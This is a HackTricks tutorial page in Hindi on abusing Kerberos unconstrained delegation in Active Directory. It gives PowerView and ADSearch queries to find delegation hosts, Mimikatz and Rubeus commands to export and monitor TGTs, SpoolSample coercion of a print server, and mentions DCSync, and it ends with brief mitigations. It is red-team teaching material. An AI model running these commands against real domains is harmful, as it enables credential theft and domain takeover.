Unconstrained Delegation
Reading time: 4 minutes
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
Unconstrained delegation
यह एक विशेषता है जिसे एक Domain Administrator किसी भी Computer पर सेट कर सकता है जो डोमेन के अंदर है। फिर, जब भी कोई उपयोगकर्ता उस Computer पर लॉगिन करता है, उस उपयोगकर्ता का TGT की एक प्रति DC द्वारा प्रदान किए गए TGS के अंदर भेजी जाएगी और LSASS में मेमोरी में सहेजी जाएगी। इसलिए, यदि आपके पास मशीन पर Administrator विशेषाधिकार हैं, तो आप टिकटों को डंप कर सकते हैं और किसी भी मशीन पर उपयोगकर्ताओं का अनुकरण कर सकते हैं।
तो यदि एक डोमेन एडमिन "Unconstrained Delegation" विशेषता सक्रिय करके किसी Computer पर लॉगिन करता है, और आपके पास उस मशीन पर स्थानीय एडमिन विशेषाधिकार हैं, तो आप टिकट को डंप कर सकते हैं और डोमेन एडमिन का अनुकरण कहीं भी कर सकते हैं (डोमेन प्रिवेस्क)।
आप इस विशेषता के साथ Computer ऑब्जेक्ट्स को खोज सकते हैं यह जांचकर कि userAccountControl विशेषता में ADS_UF_TRUSTED_FOR_DELEGATION शामिल है या नहीं। आप इसे ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’ LDAP फ़िल्टर के साथ कर सकते हैं, जो powerview करता है:
# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs हमेशा दिखाई देते हैं लेकिन प्रिवेस्क के लिए उपयोगी नहीं होते
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Mimikatz के साथ टिकट निर्यात करें
privilege::debug
sekurlsa::tickets /export #अनुशंसित तरीका
kerberos::list /export #एक और तरीका
# लॉगिन की निगरानी करें और नए टिकट निर्यात करें
.\Rubeus.exe monitor /targetuser: /interval:10 #हर 10 सेकंड में नए TGT के लिए जांचें
Mimikatz या Rubeus के साथ Administrator (या पीड़ित उपयोगकर्ता) का टिकट मेमोरी में लोड करें Pass the Ticket के लिए।
अधिक जानकारी: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
Unconstrained delegation के बारे में अधिक जानकारी ired.team पर।
Force Authentication
यदि एक हमलावर "Unconstrained Delegation" के लिए अनुमत एक कंप्यूटर को समझौता करने में सक्षम है, तो वह Print server को स्वचालित रूप से लॉगिन करने के लिए धोखा दे सकता है जिससे सर्वर की मेमोरी में एक TGT सहेजी जाएगी।
फिर, हमलावर उपयोगकर्ता Print server कंप्यूटर खाते का अनुकरण करने के लिए Pass the Ticket हमला कर सकता है।
किसी भी मशीन के खिलाफ प्रिंट सर्वर को लॉगिन कराने के लिए आप SpoolSample का उपयोग कर सकते हैं:
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
यदि TGT एक डोमेन कंट्रोलर से है, तो आप एक DCSync attack कर सकते हैं और DC से सभी हैश प्राप्त कर सकते हैं।
इस हमले के बारे में अधिक जानकारी ired.team पर।
यहाँ प्रमाणीकरण को मजबूर करने के अन्य तरीके हैं:
Force NTLM Privileged Authentication
शमन
- DA/एडमिन लॉगिन को विशिष्ट सेवाओं तक सीमित करें
- विशेषाधिकार प्राप्त खातों के लिए "खाता संवेदनशील है और इसे प्रतिनिधित्व नहीं किया जा सकता" सेट करें।
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।